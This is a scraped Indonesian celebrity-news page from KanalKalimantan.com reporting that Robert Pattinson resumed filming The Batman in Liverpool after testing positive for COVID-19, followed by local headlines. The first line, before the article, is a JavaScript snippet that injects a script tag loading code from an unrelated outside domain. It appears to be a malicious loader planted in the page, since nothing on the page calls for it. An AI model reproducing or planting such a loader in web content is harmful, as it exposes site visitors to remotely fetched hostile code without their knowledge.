(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: selebriti

Robert Pattinson Kembali Syuting Film The Batman


KANALKALIMANTAN.COM, LIVERPOOL  – The Batman kembali melanjutkan produksi filmnya. Robert Pattinson yang dikabarkan positif Covid-19 telah kembali memulai syuting film tersebut.

Robert Pattinson dilaporkan telah kembali melakukan proses syuting film yang diadaptasi dari DC Comics itu pada 12 Oktober, dilansir USMagazine, Rabu (14/10/2020).

Mantan kekasih Kristen Stewart ini terlihat di St George’s Hall, Liverpool, Inggris, untuk syuting adegan pemakaman, baru-baru ini.

Robert Pattinson, yang memerankan tokoh Batman/Bruce Wayne terlihat mengenakan setelan gelap yang dikelilingi mobil polisi Gotham.

Pattinson bersama Kravitz dan Farrel tampak memakai setelan hitam dengan wajah duka.

Di lokasi syuting, Robert Pattinson bersama seluruh kru tampak mengenakan masker di jeda syuting. Pattinson dilaporkan berjuang melawan virus Covid-19, yang menyebabkan produksi dihentikan kedua kalinya.

Penghentian produksi The Batman karena bukanlah yang pertama. Pada Maret lalu, produksi dihentikan karena seluruh industri film tertunda sebab pandemi corona.

Syuting dilanjutkan hanya dua hari pada September lalu sebelum Robert Pattinson kemudian didiagnosis terjangkit virus Covid-19.

Rilis film The Batman juga telah diundur beberapa kali. Mulai dari pemutaran perdana pada Juni 2021 ke Oktober 2021.

17 September, Batman melanjutkan syuting. Hal itu usai produksi ditunda dua minggu setelah salah satu kru positif virus korona.

“Seorang anggota produksi Batman telah dites positif COVID-19 dan diisolasi sesuai dengan protokol yang ditetapkan,” kata pihak Warner Bros. (Suara)


Al Ghifari

Recent Posts

Peternakan Babi Dekat Kampus UIN Antasari di Guntung Manggis Dikeluhkan

Pemilik Ternak Diminta Datang ke Kantor Satpol PP Banjarbaru Read More

2 jam ago

Rekayasa Pemasangan ATSC, Jalan Pangeran Suriansyah Steril Parkir dan PKL

KANALKALIMANTAN.COM, BANJARBARU - Kawasan pinggir jalan maupun median di Jalan Pangeran Suriansyah, Kota Banjarbaru, Kalimantan… Read More

4 jam ago

Pj Bupati HSU Resmikan TMMD ke-120 di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan secara resmi membuka… Read More

5 jam ago

Sekat Bakar Antisipasi Karhutla Ring 1 Bandara Syamsudin Noor

KANALKALIMANTAN.COM, BANJARBARU - Provinsi Kalimantan Selatan kembali memfokuskan penanganan ancaman kebakaran hutan dan lahan (Karhutla)… Read More

6 jam ago

Buaya di Pelambuan Banjarmasin Gagal Ditangkap, Tiga Kali Terlihat Warga Muncul

KANALKALIMANTAN.COM, BANJARMASIN - Kemunculan seekor buaya di kawasan sungai Kelurahan Pelambuan, Kecamatan Banjarmasin Utara, Kota… Read More

9 jam ago

Ambulans Baru Layanan Puskesmas Keliling di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Dinas Kesehatan (Dinkes) Kota Banjarbaru hadirkan layanan kesehatan yang lebih dekat dengan… Read More

10 jam ago

This website uses cookies.